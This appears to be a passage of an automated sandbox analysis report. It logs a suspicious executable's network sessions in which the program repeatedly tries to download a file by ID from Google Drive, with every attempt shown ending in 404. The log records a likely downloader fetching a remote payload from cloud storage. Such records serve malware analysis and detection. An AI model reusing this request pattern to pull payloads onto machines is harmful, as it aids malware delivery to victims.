                                                                          2025-01-10 14:35:22 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:22 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgQXtUEJZf4C4gkDCXKnFkydjwwQWKm1nceswqeqLOCI1hznQIp0uNPXdYf66dRviP6W_e-E86A
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:22 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-X86PfESf03BrET8MPkZ54A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:22 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wQ-usYxL1t6w6WMqOWmGTQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          36 | 192.168.11.20 | 49782 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:32 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:33 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-OFdErhOOTiuARb81Ssn7SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          37 | 192.168.11.20 | 49783 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:33 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:33 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4XBvI73cbfhFTD7NKIHyRefins8Nh-tMwIvGsVOJMNJUm46jRX1TkZlVl8aIjOUN2E_lnlG5o
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:33 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-QtfbGDAh5BauZHnw-osd9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ma6VLx99_FLS-Wm1bInyGA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          38 | 192.168.11.20 | 49784 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:44 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:44 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-2H5MY1Yl1l0rL9pR86BEOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          39 | 192.168.11.20 | 49785 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:44 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:45 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgSJS6KD6gxCzrqqBeRy24CousGyYUM_mZdjcRvC4T79YGmFUkvXV5do_CUI5_pjniO7uZ7cyG4
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:44 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-0PzhdXXu0uPuUoB_l9032w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wYlOPcmGQ78_WPBXATEHoA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          40 | 192.168.11.20 | 49786 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:55 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:55 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:55 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-_5JcRp9BKMoIVYVHTesxuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          41 | 192.168.11.20 | 49787 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:55 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:56 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7MGSCM-SqO8QIqqKWY3qJxCkHxZcO5bdMP9oMniQH9Cu54DdZ51K_0TXxSih3FWwrqHwnqwTg
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:56 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-cf6_GHo-5Pu2mtyymmWuuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="52aLqD_X8hDDGyzddnNb3g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          42 | 192.168.11.20 | 49788 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:06 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:06 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-O6vDTEKPHkbITwrsRYmaZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          43 | 192.168.11.20 | 49789 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:07 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgTPSAVtfR4XjmO_v3WA6bPvV6XjRtUcKAea1tg9dsK3ECRk2pI-yjq12m49LcgZdGyN
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:07 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-khC-4aYosW-NtjAkFBbzkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
